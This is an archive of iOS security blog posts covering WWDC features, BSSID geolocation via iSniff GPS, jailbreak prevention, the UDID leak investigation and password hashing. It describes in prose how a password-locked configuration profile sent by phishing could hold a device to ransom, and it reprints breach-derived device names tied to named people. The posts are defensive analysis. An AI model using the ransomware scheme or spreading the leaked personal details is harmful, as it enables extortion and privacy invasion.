Author Archives: dschuetz
Yesterday Apple unveiled the latest versions of OS X (code-named Mavericks) and iOS 7, at the annual World Wide Developer Conference (WWDC). The general focus was on end-user features and items of interest to developers, but several items appeared to have an impact on security in one way or another.
The beta versions of both operating systems were also released to developers yesterday, but I haven’t seen them yet (and once I do, I’d probably be bound by NDA to not talk much about them). So before I go that route (hopefully later this week!), I thought it would be useful to quickly review some of the items I found potentially significant. I’ll briefly describe the features, then summarize some of the security questions I have at the end. Also, whenever I talk about “Early Reports,” I’m referring to information not specifically announced by Apple, but which have leaked through screenshots and other reports.
OS X “Mavericks”
Though my focus at Intrepidus has generally been on iOS, I do use OS X on a daily basis, and a few items here seemed worthy of mention (plus, they also pertain to iOS).
- Passwords in the Cloud — a secure vault, stored on iCloud, for website logins, credit card numbers, wi-fi passwords, etc. This was cited as using AES-256 encryption, pushed to trusted devices. When used within Safari, it can even auto-suggest random, secure passwords as you create web-based accounts.
- Notifications in the lock screen — when the computer is locked or asleep, notifications (including push notifications) can queue up, and will be displayed to the user the next time they wake up the computer, while the screen is still locked.
- The map application can send directions to an iPhone, but how this works wasn’t explained. My speculation is it’s an iCloud document, just like you can send Passbook passes from Safari directly to your iOS devices.
This was the big change. So big, they repeatedly referred to it as “the biggest change to iOS since the introduction of the iPhone.” Clearly, there have been big changes in the interface design, but also several new features were introduced as well.
- AirDrop — iOS devices can now share information directly with nearby friends over peer-to-peer Wi-Fi. This was introduced in OS X Lion, and doesn’t require actually being on the same Wi-Fi network.
- Notification center on lock screen — similar to the new feature in Mavericks
- Control Center — provides an easy way to toggle features like Wi-Fi, Airplane mode, and Do Not Disturb, by simply swiping up from the bottom of the screen. This also allows quick access to four applications: Flashlight, Timers, Calculator, and Camera.
- Better multitasking — applications may now actually remain in the background, with the operating system using some careful monitoring and management to reduce the cycles they use to the bare minimum. This also provides a facility called “push trigger,” where an application in the background can actually immediately act on data received in a push notification.
- Safari: iCloud keychain and parental controls — I don’t have any idea what the parental controls would do, but if it provides a way to blacklist and/or whitelist websites, this could be somewhat useful in corporate settings. And, of course, the iCloud keychain (described above for Mavericks) is a major new feature.
- App store automatic updates — this is a good/bad thing, in my mind. People certainly want to stop having to do big updates of many apps every week or two…but sometimes a new version of an app may be buggy, and users might not want to upgrade immediately. Also, corporations may want to review apps before they’re updated, to ensure that new features don’t change the risk profile the app poses to their enterprise.
- Activation Lock — this new feature allows a user to configure an iOS device such that if it’s been remotely wiped (because it was lost or stolen), then the device cannot be re-activated until the original iCloud credentials are entered. This should provide some additional deterrence against theft, at least, once the feature becomes widespread and well understood.
These keynotes always focus on only a few features, and there are always several dozen other features that don’t get described in detail. In this case, two screens full of features were shown during the keynote, including several that appear to have relevance to security or corporate users:
- Enterprise single sign on — definitely interesting
- Per-app VPNs — would be very interesting if each app could be assigned to an arbitrary VPN
- Streamline MDM enrollment — no idea what this could mean, since (for the end user) it’s already pretty simple
- App store volume purchase — this has been a complicated endeavor since it was first introduced, so changes here could be significant
- Managed app configuration — this might be similar to application profiles in the OS X profile manager (which are an outgrowth of the old MCX system in pre-Lion OS X)
- Scan to acquire passbook passes — probably built-in QR scanner
- iBeacons — Low Energy Bluetooth location
- Automatic configuration — possibly the aforementioned app configuration
- Barcode scanning — may confirm the passbook assumption
- Data protection by default — finally, all apps may have the additional “encrypted when device is locked” protection
Finally, some interesting bits have already been seen in screenshots on the web:
- Integration of Vimeo and Flickr accounts for share sheets (similar to existing Twitter and Facebook integration)
- Separate iCloud security panel, including integrated two-factor authentication, a separate passcode for the iCloud keychain, and a toggle for “Keychain Recovery” subtitled “Restore passwords if you lose all your devices.”
- How are passwords in the cloud stored, and does anyone else have access to the data (for example, if you forget your key)?
- Can we control what notifications appear on the lock screen? For example, allow Twitter, but disallow mail, while allowing both Twitter and email when the device is unlocked?
- Does AirDrop on iOS introduce any new problems? Can strangers try to push data to you while in public, even if you’re not logged into a public Wi-Fi? Could that lead to a phishing vector (for example, sharing a malicious configuration profile over AirDrop)?
- Can you change the applications available for quick-launch in the Control Center? Early reports indicate that the Control Center may be enabled for use in the lock screen, and if so, how does that affect apps which encrypt their data?
- How much can an application do when woken up by a push trigger? Could an attacker in control of a malicious app and its push server remotely enable the device microphone, for example? Can this be done while the device is locked?
- Can automatic app updates be configured, for example, to wait a week after release prior to being applied? Can the feature be disabled altogether? Or better yet, can certain apps be flagged for manual updating only?
- For activation lock, can the remote geolocation and messaging features of Find My iPhone remain intact even after the device was wiped? Currently, users are faced with a tough choice, whether to wipe the device and give up any chance of locating it again, or leave it trackable, and able to receive messages, but at risk of someone extracting sensitive information from it. It’d be nice if one could wipe the device, but still be able to try to track it down and send “If found, please call me for a reward” messages to the finder.
All in all, there appears to be a great deal of change coming in both OS X, and especially, iOS. This summer will keep us busy exploring all the new features and their security implications, and hopefully the final release will prove to be an improvement in many areas.
It’s been a while since I thought much about location-based services on iOS systems, in particular their privacy implications. Of course “Locationgate” happened back in March 2011, when researches called public attention to a database of location points saved on iPhones. A year later, Mark Wuergler reported on a possible information leak where iOS devices disclosed the MAC addresses (more properly, BSSIDs) of the last few access points they’d linked to.
These two issues were brought together last summer, at the Black Hat Arsenal, when Hubert Seiwert (@hubert3) presented a tool called iSniff GPS. The tool was described in more detail at Syscan in Singapore just a couple of weeks ago, but finally came to my attention in a tweet Wednesday night pointing me to SC Magazine (Australia).
Intrigued, I spent some time yesterday installing the iSniff tool and putting it through its paces, and have a few thoughts I’d like to share.
The iSniff GPS tool contains two main components: A sniffer, and a GUI. The sniffer watches for leaked ARP packets, identifies the BSSIDs they’re probing for, and fetches information about them from Apple. The web-based GUI (built on Django) shows you the devices that have been “noticed” on the local network, and lists networks those devices have visited. When a probed network was matched in Apple’s database, a link will also take you to a visualization of all the data Apple has on file regarding that access point’s location.
After installing the tool, I took an old access point, connected my laptop directly to it, and joined a few iOS devices to see what happened. The tool was definitely working as designed — devices immediately appeared in the list, along with a list of BSSIDs each client probed for. Clicking on each client in the list displays a detail screen with latitude and longitude for each network BSSID found in the Apple DB, and a link to display the information on a map. Another tab pivots the data, listing it by network (with the relevant clients next to each), while other tabs offer direct mapping of selected BSSIDs and even searching and mapping of the wigle.net SSID database.
Interestingly enough, none of the access points the devices queried were in Apple’s database. The access point at work was found in the WiGLE DB (listed both by name and BSSID), but not in the Apple DB. My home access point didn’t show up in either database, despite having several iOS devices connecting on a daily basis, not to mention multiple visiting family members most of whom have iOS devices as well. [Note: Not entirely correct, see update below.]
However, another network in the building did show up in Apple’s DB, and I was also able to accurately geolocate several access points near our sister company (iSEC Partners) in Manhattan. Perhaps there hasn’t been enough traffic by our building in the year since we moved in? We just haven’t been reported frequently enough to be included in the database?
That’d be a great theory, except that the BSSID for the access point I was testing with also appeared in the Apple DB. That seemed really odd, since this AP is almost never on, and when it is, it’s rarely for more than a few days at a stretch, and almost never accessed by anything other than my own devices. Occasionally it’ll be set up as “attwifi” for testing, and I’ll get a few people in doctors’ offices connecting (and enjoying free internet access), but that’s probably no more than a dozen devices, all told, ever. Finally, the AP gets brought to the beach every year (and lots of people use it there) but that’s obviously a totally different location, and even then, not more than a couple dozen additional devices. And again, only for a week.
So why is an access point, active 24×7 for over a year, not in the database, and another one, in use for maybe 3 or 4 weeks total time over the same year (and one of those weeks in a different state), not in the database? There’s definitely some odd criteria in play here that I haven’t yet been able to guess at.
What does all this mean? It’s clear that the Apple BSSID database has real utility: It helps devices quickly, and more accurately, determine exactly where they are. There might be a way that Apple could restrict how queries are performed on the database, but it’s possible that would be difficult to do effectively. And of course, Apple isn’t the only entity maintaining such a database. Trying to keep your AP information out of a publicly-accessible database just isn’t going to happen.
On the other hand, the leakage of the BSSID data when a device joins another network is a little harder to justify. What exactly is the utility the user gets from this? A faster recognition by the device that it’s on a network it knows? What services benefit from this, and to what degree? It may well be acting in accordance with RFC 4436, but that doesn’t necessarily make it right (and very few, if any, Android devices exhibit the same behavior).
Ultimately, the real question is whether the daily benefit to the end user outweighs the risk that the location of their home, or school, or workplace, might be disclosed to an eavesdropper at a coffee shop. Which, in a strict risk analysis, probably falls far short of requiring elimination of the leakage. Perhaps it could be mitigated with a user preference setting, but this problem is pretty esoteric even for information security researchers, and I suspect clearly describing the problem (and its implications) to the average user in the space of a few lines on a preference pane would be flat-out impossible.
At any rate, this is a very interesting demonstration of fusing publicly-accessible data from multiple sources to gain information not otherwise explicitly revealed. And that in itself definitely makes the iSniff GPS tool worth checking out.
Quick Update, 5/13/2013: I was out of town over the weekend, but now have done a little more checking, based on Hubert’s comments below and on Twitter.
Turns out, of the two networks at work (open/guest and closed/employees), one of the guest BSSIDs is in Apple’s DB, but none of the closed BSSIDs are, which still seems odd to me. Of four neighboring business’ BSSIDs checked, all four are in Apple’s DB. And I looked again for my home AP, and it was in there — I’d been querying the wrong MAC address.
So the AppleDB is a little more complete than I’d thought, though there’s still something keeping our main work net from showing up.
And I also verified that the ARP queries being sent out by iOS devices upon joining the network are not for our local APs, but for the router / DNS server (which are both the same here). So for places where the router / DNS is also the Wi-Fi access point (many, many places), the ARP disclosure can lead to geolocation via Apple’s DB. But where the Wi-Fi and router / DNS are split to multiple devices, it’s a bit harder to find.
A couple of months ago, at ShmooCon 2013, Tim Medin gave a great short talk titled “Apple iOS Certificate Tomfoolery.” One of the most interesting ideas I took away from this talk was the idea of ransomware delivered through a configuration profile. Briefly, configuration profiles can be used to control many aspects of an iOS device’s configuration. They can enable features, disable features, and even hide applications from the user.
This is the tricky bit: Create a configuration profile that disables Safari, disables installation of applications, even disables iCloud backups, and adds a “READ ME” web page to the user’s home screen. Put a password on the profile, so the user has to enter the password in order to remove it. Now, you just need to convince the user to install the profile, and you can do that simply through email or SMS phishing. Once they install it, half their expected functionality suddenly goes away, and if they tap on the “READ ME” page, they’ll see the instructions as to how to pay ransom to receive the password to remove the profile. Win! (well, not for the user).
Now, fortunately, there are a couple of flags that (might) alert the user that something odd is happening. First, in the initial profile installation screen, is the list of contents, which includes “Profile Removal Password.” Similarly, tapping on “More Details” clarifies that this is a locked profile. Of course, if the email introducing the profile was written well enough, then the user might already expect and accept this. Hopefully we can train them not to. Also, if the user has a passcode on their device, then they have to enter their passcode as well, so it won’t simply install without the user noticing.
But what if they ignore all the warnings, and install the profile anyway? Well, all might not yet be lost. Turns out, the removal password is included in the profile, in plaintext. The attacker could choose to encrypt the profile, but to do that they need a public key from the target device, which might not be so easily acquired. So, assuming the profile is not encrypted, just pull down the .mobileconfig file from the original phishing email, open it up, and find the password.
Of course, the attacker could get really tricky, and serve up a file with a different password each time, placing some kind of key into the ransom notice (“Pay me $35 to remove this profile. Use the word ‘ostrich’ when you send me your bitcoins”) and then that key would be used to derive the actual removal password. If this is the case, then each time you hit the page you’d get something different, and so you wouldn’t be able to recover the correct password. In that case, the only real way to remove it is either to pay the ransom, or, if the device is jailbroken, get in and remove the profile directly from the filesystem.
In iOS 6.x, a new feature was introduced that can prevent the user from installing profiles. This feature is only available in Supervised Mode (via the Configurator application), however, and so isn’t of much use to the general population.
It’s almost time for another ShmooCon, and as usual, we’ll be out in force for the conference. We won’t have a booth this year, but we will be milling about, attending talks, and even giving a couple presentations of our own. We might even have a little puzzle to share…just ask any one of us for details. (David might have a slightly more visible puzzle contest as well, but, well, there were secrecy oaths, threats of retribution, etc., so the less said about that, the better).
Be sure to check out our talks, too. Roman Faynberg will be presenting Armor For Your Android Apps, Saturday at 3:00, a discussion of Android vulnerabilities, with plenty of real-life examples and hair-raising war stories, as well as tips and best practices to avoid such problems in development. There’s even a HackMe-type app to help demonstrate some of the problems.
At exactly the same time (sorry, we couldn’t control it!), David Schuetz will be presenting on Protecting Sensitive Data on iOS Devices. His talk will try to cut through some of the technical mumbo-jumbo and present best practices for configuration, management, and application develoment on iPads and iPhones, with a goal to making it easy to explain to management-types.
We’re also hiring! Current openings for [testers | consultants | ninjas | pirates] (sorry, no open positions for samurai or lumberjacks). If you’re interested, chat with one of us at the con, or send us an email at email@example.com.
So if you’re going to be at ShmooCon, stop us in the halls and have a chat. We can’t wait to see you!
The latest iOS jailbreak was released yesterday. Called “evasi0n,” it can be used to bypass most all protections in iOS 6.1 on any device that supports it. It’s quite cool, and was certainly something I was looking forward to (since much of my work is greatly aided by working on a jailbroken device).
However, another part of my work is ensuring that our customers’ devices are as secure as they can be. And having an available jailbreak kind of weakens those assurances. So it might be useful to find a way to prevent the jailbreak from working.
And, it turns out, there might be such a way. At least, until the jailbreak team finds a workaround for the workaround.
Last March, Apple released the Configurator Application. Using this application, iOS devices can be put into a “Supervised” mode, strongly locks down many features. One of these features is the ability to connect to iTunes and do backups/restores. On a supervised device, this functionality is possible only from the machine designated as the device’s supervisor.
The evasi0n jailbreak just happens to depend on the iOS backup / restore channel. So much so, in fact, that this is what I got when I tried to jailbreak a supervised device:
Could the evasi0n authors work around this? Possibly. It depends on how deep the supervised mode controls are embedded within iOS. If the device requires a unique host key (from the supervising machine) in order to restore data to the iPad, then it could well be impossible to make evasi0n work on anything other than the actual supervising host.
Of course, putting a device in supervised mode isn’t for the faint of heart — it’s a major shift in how one configures and manages iOS devices. So this probably won’t be a “Jailbreak Stopper” for every major organization out there with large pools of iPads. But it might provide some additional comfort in small groups, like iPads checked out to executives, etc.
But couldn’t a user just remove the device from supervision? Yes, but that’s harder than it sounds. “Erase all Settings” won’t do it, and even “Erase all content and settings” (essentially, “wipe the device with extreme prejudice”) won’t kill the supervisory link. To make a device unsupervised, you need to connect it back to the supervising machine, and sever the link within Configurator. You should also be able to do it in iTunes by doing a full OS restore. In either case, however, all data on the device is wiped, so anything installed while in supervised mode would be lost prior to the jailbreak.
Bottom line: if your organization has iOS devices with sensitive information, and you’re concerned that this jailbreak might put data at risk, it might be worth checking out Configurator and putting some of your devices under supervised control.
[shameless plug: I'll be talking a little about this, and other ways to protect your data on iOS, at ShmooCon.]
UPDATE: Further thought should’ve made it obvious to me that forcing encrypted backups would have the same effect, and this is borne out in some simple testing. Of course, the user can’t be permitted to remove the encryption: so it needs to be forced through a configuration profile, preferably one that can’t be removed. If this setting is implemented through Mobile Device Mangaement, then the user could remove the device from MDM, disable encryption, jailbreak the device, and then re-enroll in MDM. So not entirely foolproof, but perhaps a more practical approach than shifting everyone to supervised mode.
I’d heard about the alleged FBI/Apple UDID leak shortly after arriving at work last Tuesday morning, and immediately downloaded and began reviewing the data. Less than an hour later, I’d surmised that comparing apps across multiple devices might help narrow down the source.
Several hours later, at 3:00, I saw a tweet from @Jack_Daniel suggesting that people checking their UDIDs in online forms only enter partial numbers . And that made me wonder: “How many digits is the minimum people need to enter in order to be guaranteed a unique result?” Sort to the rescue:
cat data | cut -c 2-7 | sort | uniq -c | more
This gave me a bunch of repeats. That’s not too surprising, as I’m only looking at 6 digits. Next up was 8 digits, and still I saw hundreds of repeats. Then I changed tactics and simply counted the number of unique UDIDs…and I came up with a number significantly different from the 1,000,001 that were released: 985,117. So there are almost 15,000 duplicates. Looking further, I saw that many of these duplicates have different device tokens, prompting a tweet, about 3:15:
Interesting. Just noticed there are UDID duplicates in that data dump, with multiple APNS tokens. Different app providers, or multiple regs?
About 45 minutes later, on my way home, @danimal suggested: “@DarthNull multiple apps? Seems like maybe a game or ad company.” I immediately thought, damn, that must be it. At 4:23 pm, I replied “Yes! makes sense.”
And two minutes after that, I found what seemed to be the source of the breach.
I had decided to look more closely at the most frequently repeated device IDs, on the theory that perhaps that would belong to a developer. They’d naturally test multiple apps for their company, each of which should have a different device token. So first, more shell magic:
cat data | cut -c 2-7 | sort | uniq -c | sort -n -r | head
Wow, some are repeated 10 or even 11 times!
11 4daa64abd 10 d1f575954 10 aa5c7aedb 8 12e6ec97e 7 f661c1396 7 4225e2a59 6 91a83b0e3 6 480074431
I searched for the first one, and found 11 different entries for a “Gary Miller.” Nothing much there. The next one, though, had some interesting device names:
'Bluetoad Support' 'Bluetoad Support' 'BT iPad WiFi' 'BT iPad WiFi' 'CSR iPad' 'Customer Service iPad' 'Developer iPad' 'Developer iPad' 'Hutch Hicken’s iPad' 'Hutch Hicken’s iPad'
Six different names, four repeated twice (implying at least a pair of apps and several users). Then I looked at the next entry, with 10 repeats: it’s variously named Robert, Red, and HP Pavilion. Meh. The entry, with 8 repeats: GoldPad. But the entry with 7 repeats really grabbed my attention:
'Bluetoad iPad' 'Bluetoad iPad' 'Client iPad BT' 'Client iPad BT' 'CSR/Marketing iPad' 'CSR/Marketing iPad' 'Jessica Aslanian’s iPad'
Support? Customer service? Developer? Marketing? A quick Google search revealed that, yes, BlueToad does develop iOS apps. In fact, they build magazine apps for many different publishers, and a quick trip through the iTunes store showed me that these applications use Push Notifications.
As this was the kids’ first day of school, we went out for a nice dinner to celebrate. While there, I thought more about what I’d found, and decided to roll the dice: I sent an email to BlueToad, using the email address on their website. I didn’t say much, just that there’d been a breach involving UDID and push tokens, and I’ve found some interesting data that suggest they may be involved. After returning home, I spent another four hours digging for more.
By the time I went to bed, I had identified nineteen different devices, each tied to BlueToad in some way. One, appearing four times, is twice named “Hutch” (their CIO), and twice named “Paul’s gift to Brad” (Paul being the first name of the CEO, and Brad being their Chief Creative Officer). I found iPhones and iPads belonging to their CEO, CIO, CCO, a customer service rep, the Director of Digital Services, the lead System Admin, and a Senior Developer.
This felt really significant. But as I started writing up my notes, doubt crept in. What are some other explanations? Perhaps everyone at the company uses a common suite of applications. Like the same timesheet app, for example. Then of course they’d all appear in the data. But even still, I couldn’t shake the feeling that I’m onto something.
I spent much of the next day writing a detailed analysis of the situation for our blog. Then, about 4:30, I drafted a follow-up message to BlueToad about what I’ve found, how I found it, and what I think it means. Also, I mentioned that though I’m reluctant to publicly name them without more solid data, it seems likely that others will also find their name in the dump.
Since I now have several more employee’s names, I spent some time looking for email addresses, to (hopefully) increase the chance of a response. While searching, I stumbled on a partial password dump for the company! And it was dated March 14, the same week that the hackers claimed they’d hacked into the FBI computer. Suddenly, I felt a lot more confident again, and I mentioned this connection in the email.
Shortly after 8:00 that evening, I heard from Hutch Hicken, their CIO. He thanked me for what I’ve done, and for my discretion in contacting them first rather than simply going public. He told me that they’re assessing the situation, but don’t yet know anything for certain. He didn’t think the March leak (which they’d already been aware of) was related, but that the rest of my findings were concerning. He told me they plan to “do this right,” he promised to keep me in the loop (as much as is feasible for a non-employee).
Most of the next day (Thursday), I didn’t really hear much. Then about 2:30 on Friday, Hutch called me again. Almost immediately, he told me that we can talk, but only if I agree to embargo the story until noon on Monday. My response was “Well, the fact that you’re asking me this tells me that I’ll want to say yes,” so naturally I agree.
I’m told that they’re confident the leak came from them, and he filled me in on some of the technical details (I’ll leave those details to others, to make sure I don’t make any mistakes). But they’re almost certain of their involvement, and are continuing to handle the situation.
Then he hit me with a big surprise: Kerry Sanders, a correspondent for NBC Nightly news in Miami, wants to interview me. On camera. He’s in the next room, and the phone gets passed to the reporter, and next thing I know we’re arranging an interview that night. He didn’t arrive at my house until 11:00 (his plane was delayed), and we spent 45 minutes talking about what I found, how I found it, the privacy implications of the breach, and other related topics.
By the time he left at midnight, I was exhausted. As I write this, I still don’t know how much of the interview he’s going to use, or even if it’s going to make it onto the air Monday night. Either way, it was certainly a surreal way to conclude what started out largely as another puzzle hunt.
I’m still not completely clear on all the technical details. Was BlueToad really the source of the breach? How did the data get to the FBI (if it really did at all)? Or is it possible this is just a secondary breach, not even related to the UDID leak, and it was just a coincidence that I noticed? Finally, why haven’t I noticed any of their applications in the (very few) lists of apps I’ve received?
Hopefully, I’ll learn the answers to many of these questions in the coming days. Either way, I’m glad to have been able to help, and offer my thanks to BlueToad for their cooperation, and their quick response.
UPDATE: Here’s the link for the NBC Nightly News post.
UPDATE: Timo Hetzel kindly corrected a misunderstanding that I had regarding how device tokens are created. I had believed that each application on a device had a different token, but that was in error — it’s a single device token for all apps on a device. So whenever I saw many tokens for a given device, that represented (in most cases) multiple refreshes of the same device. However, apps using the development “sandbox” Push Server receive a different token than what apps using the main production server receive, so seeing multiple devices from BlueToad, each with exactly two tokens for a given device name, further implicates the use of those devices by developers.
Early Tuesday, a file was released detailing the compromise of 1,000,001 records, supposedly from an FBI laptop. Reportedly, these represented only a small portion of a much larger breach — over 12 million records. It’s further claimed that the full breach includes personal information such as mailing addresses and telephone numbers, while the published data was limited to only a few specific fields.
That’s what we’ve been told. But what do we actually know?
We know that there are, indeed, 1,000,001 records. We know that they contain universal device IDs (UDIDs) for iPhones, iPads, and iPod Touches. We believe that they also contain valid device tokens (devtokens) for the Apple Push Notification Service (APNS). And that’s about it.
But that hasn’t stopped the Twitterverse from becoming all, ahem, a-twitter, about this breach. Some selected headlines and tweets:
- “The FBI and Apple have some serious explaining to do.”
- “The American people have a right to know how + why the @FBI got 12 million Apple devices users’ private info.”
- “Hackers reveal how FBI used Apple UDID’s to track 12 mn users”
But, amid the noise, some legitimate questions have been raised:
- “What can malware hacker do with UDID? Any attacks yet using UDID?”
- “Wouldn’t having a device UDID + APNS token make it easier to silently ‘push’ malware/spyware to a phone?”
Let’s talk about some of these.
First, could the FBI have built this database? They couldn’t easily build it by eavesdropping: That much data simply isn’t passed in a conveniently concise fashion. It’d take a lot of work to pull together, and it’d be highly unlikely to end up on some agent’s laptop.
Could they have received it from Apple? While Apple would need a list of devtokens to route push messages to end users’ devices, that list could be built on-the-fly as devices come online and connect to Apple. It probably wouldn’t need UDIDs, and certainly wouldn’t need all the other personal information allegedly contained in the breach. [Update: A statement from Apple says, in part, "The FBI has not requested this information from Apple, nor have we provided it to the FBI or any organization."]
So where could this data have come from? The logical answer is a 3rd party application server. For example, a cable TV carrier might have an iPhone app for their customers to view and pay bills. The back-end account database would then need mailing addresses and probably phone numbers. If they also push messages to customer’s devices (for example, to alert of an outage) then they’d need devtokens. A compromise of that kind of application (from a utility, bank, social media company, game company, publishing company, etc.) is a very plausible source of this leak.
What about the tracking question? Couldn’t this information be used to track people? Tracking genrally implies a time-based log of what people are doing, where they’ve been. And even from what the hackers have said, this database contains nothing of the sort. It’s simply a static association between a device, an APNS devtoken, and a mailing address (and similar information).
Okay, so the FBI is definitely NOT using this to track people. (Also, the FBI has officially denied it came from them.) But the UDID is, you know, ZOMG bad, right?
Right. Sort of. The UDID itself isn’t so bad, and is used internally by a bunch of Apple services (including the app store and Mobile Device Management). What makes it problematic is when other services use it to track user activity. For example, a game application might tell a 3rd party service whenever you start a level, when you finish it, how long you spent playing it, and whether you won. The big risk comes when this tracking information can be correlated across many applications, and many external services. Then it’s a huge privacy issue. For example, instead of a game, think of a newspaper app, and a 3rd party knowing which articles you read, and how long you spent on each one. And possibly sharing that information with other users of their system (that is, other application vendors).
This is why Apple has been working for over a year to get developers to stop using UDIDs altogether.
So what about the last questions? Can this be used to push malware to a phone, or do something else bad?
Not really. Push messages are short (under 256 bytes), and generally are just simple messages like “You have mail” or “It’s going to rain.” Mobile Device Management (MDM) servers can push out a message that says “Come to me for instructions,” and those instructions might be “Here, install this app,” but the device first has to be enrolled in MDM, and then the hacker has to forge the MDM message (and intercept the client’s response to then impersonate the server). Plus, even if this leaked database were from an MDM server, it still wouldn’t have enough information to forge an MDM message.
It could, in theory, be used to forge a message from whatever application the data was the source of the leak. But even that is exceptionally difficult. For one, you’d need the certificate used by the application’s push server (which might be in the hands of the original attacker, but certainly shouldn’t be available to anyone else who’s seen the UDID list). Plus, APNS uses fairly strong bi-directional certificate checks, so just impersonating the Apple APNS server is pretty difficult.
Too Long; Didn’t Read summary: After all that, what’s the bottom line?
- This probably came from a 3rd party application vendor.
- It probably didn’t come from an FBI laptop, unless (perhaps) it was there as part of an investigation into a breach at the aforementioned vendor.
- There’s not much an attacker can do with this information directly, that is, targeting the users’ devices.
- However, wherever the UDIDs were improperly used by a 3rd party application, then it’s possible that some personal information / privacy concerns / account breaches may result from those uses.
What can you do about this? Really, not much at all. Complain to compaines which use UDIDs unsafely (if you’re even fortunate enough to know about it to begin with). But, as Aldo Cortesi has said, that’s a tough hill to climb. And as applications begin to filter out that require iOS 6, be sure to upgrade them, and hopefully that’ll slowly but surely kill the 3rd party use of UDIDs.
Also, hopefully the vendor who was the original source of this leak has realized what’s happened, and taken appropriate corrective actions (replacing their push certificates, etc.)
Finally, if you have a device that’s on this breached list, please contact me at david.schuetz at intrepidusgroup dot com. It’s possible that we can narrow down which applicaton was the source for the devtokens and, thus, the leak. I thought I’d managed to figure this out last night, but eventually decided I simply didn’t have enough solid information. Knowing clearly what the source of the leak is will give users the strongest ability to protect themselves against its effects.
Last year, I had a great time trying to solve the Fidelis Security Systems‘ Decode This! puzzle at Black Hat. But I wasn’t fast enough to win. This year, I resolved to not make the same mistakes. And in the end, it paid off!
Much like last year’s puzzle, this one involved a block of Unicode text (filled with all kinds of unpronouncable glyphs), and several hints posted on Twitter. I played with the puzzle off and on before I left for the con, but didn’t really attack it full-bore until I got onto the plane for Vegas.
Near the end of my five hour flight, I had the breakthrough that I should have had three weeks prior, and knew that I was almost done. But just then, they announced that we were beginning our descent and I had to put away my laptop.
Shortly after landing, a new hint was posted, which I immediately recognized as giving me the key. I found a table in the terminal, sat down, and completed the puzzle.
A few Twitter messages back-and-forth with the puzzle creator, and we’d decided that not only do I have it right (or close enough — I was having issues with the last character), if I can be the first one to the booth with the answer then I’ve won. So we rushed over, grabbed an expo pass from our friends at PhishMe, and ran over to the FidSecSys booth. Next thing I know, I’m posing with a giant novelty check for $1000!
You can read the complete story of how the puzzle worked, and some of the silly mistakes I’d made along the way, on my personal blog.
In late May, Apple quietly published a document entitled, simply, iOS Security. This short whitepaper describes several aspects of security within their iPad, iPhone, and iPod touch ecosystem, providing a high-level introduction to certain features and some fairly deep technical information for others. The stated goal is to help security-minded customers to better understand the core security features present in iOS. It’s definitely worth a read, but for now, let’s talk about some of the more interesting highlights.
It starts off describing the overall system architecture, from the boot ROM (including a public key used to validate system software) though the Low Level Bootloader and into the kernel and application layers. Executable code at all layers, including OS, Apple, and third-party applications, is signed, and the signatures are validated before the code is run. These checks help to keep malicious code from affecting the system.
Also described are some of the runtime security features. The core feature here is application sandboxing, where each application is limited in where it can write data, and prevented from accessing other application’s data or code. To share information with other applications, developers need to communicate through iOS APIs or services. Another noteworthy mention is that the core operating system partition is mounted read-only, further limiting the ability of a malicious program to attack the device.
Probably the most interesting section of this document details the Encryption and Data Protection features of iOS. Much of this is not new, having been detailed at WWDC conferences and in other devleoper documentation (not to mention several talks by prominent security researchers), but having it in a single, easily-accessible format is a welcome improvement.
The use of hardware-level AES-256 cryptography to provide full-disk encryption and a fast remote wipe capability is already well known, as is the use of a unique UID key embedded in each device’s hardware. What came as a surprise was the statement that this UID is not recorded by Apple or its suppliers, which means that keys (and data) protected using that UID cannot be decrypted by anyone not in possession of the target device (or, presumably, NSA-level supercomputers). Potential issues related to securely erasing stored keys from flash memory are also addressed with the Effecable Storage, where memory blocks are directly erased at a very low level.
Next up is a high-level description of file-based data protection attributes, which, when combined with a device passcode, provide application-level controls over data accessibility. The various protection classes are described, both for files and keychain entries, and it even provides a handy reference chart for system-level keychain entries like Wi-Fi passwords, email accounts, and private keys.
The data protection section finishes with a clear description of the four types of keybags in use on iOS: System, Backup, Escrow, and iCloud Backup keybags. In addition to the plain-English explantion of each keybag’s purpose (and location), the high-level structure of the keybag itself, along with protections for each key, is also given.
Two short sections, one describing Network Security features, and the other providing information on Configuration Profiles, device Restrictions, and MDM control, finish up the document, along with a short glossary.
Unfortunately, the whitepaper doesn’t have enough detail to serve as a reference for programmers or reverse engineers testing specific features. However, it is a great introduction to the complex collection of security features core to iOS. This should be required reading for enterprise-level security engineers and managers, whether contemplating future iOS support or hoping to better understand what they already have.
Two weeks ago, I discovered that Apple sends an unsalted SHA-256 hash as part of an AppleID authentication process. I was looking at traffic from my iPad using MITM Proxy, and came across the following interesting packet:
The “pwdHash” caught my eye, both because, well, it’s a hash, and also because it looked like a 256-bit hash, which I’d been finding used in some other commercial iOS apps lately. But mostly, it caught my eye because there wasn’t any field labeled “salt.” This might not mean anything — the salt might be known to both parties, and so doesn’t need transmitting. Or maybe it’s a shorter hash, and the first 16 bytes are a salt. Still…it’s worth checking out.
You might also notice a complete lack of any other session-related information in the HTTP header or in the submitted XML. There’s nothing else for the server to go on, other than this hash and the accompanying AppleID.
So, from this I’m inferring one of two things: Either Apple’s got a database of unsalted SHA-256 password hashes for AppleIDs (bad), or they’ve got a database of plaintext passwords for AppleIDs (worse). Either way, I was really surprised by this.
So what’s the best way to store password hashes, anyway? There’s been a lot of talk about exactly this over the past day or so, and while almost everyone agrees that unsalted hashes are bad, it’s harder to find agreement on what kind of salt is appropriate.
Probably the best argument (in terms of immediate security and foreseeable longevity) is made in favor of algorithms that make use of key stretching features to increase hash strength. bcrypt, Scrypt, and PBKDF2 have been frequently cited as good candidates. These algorithms use a high work factor, that’s difficult to avoid with faster hardware or parallelization, to ensure that brute-force attempts are very very slow. You can read more about how bcrypt, for example, makes these sorts of attacks much more difficult in this short blog post from 2010. Yes, two years ago. It’s not like these problems, or their solutions, are new.
Are you responsible for the development, maintenance, or security of an application that uses password hashes as part of an authentication system? Open your calendar now, and set aside some time in the next week to look at how you do things and see if it couldn’t be made better. Hopefully, your users will never have need to thank you.
Update: Jeff Jarmoc (@jjarmoc) correctly points out that the hashes don’t have to be stored exactly as transmitted — they could simply be used as input for a more secure hash, like one described above. Even Apple is storing the unsalted hashes, they could easily update the servers to a system which stores (for example) the bcrypt of the hash. The nice thing about this is it should only require changes to the server, not to individual clients.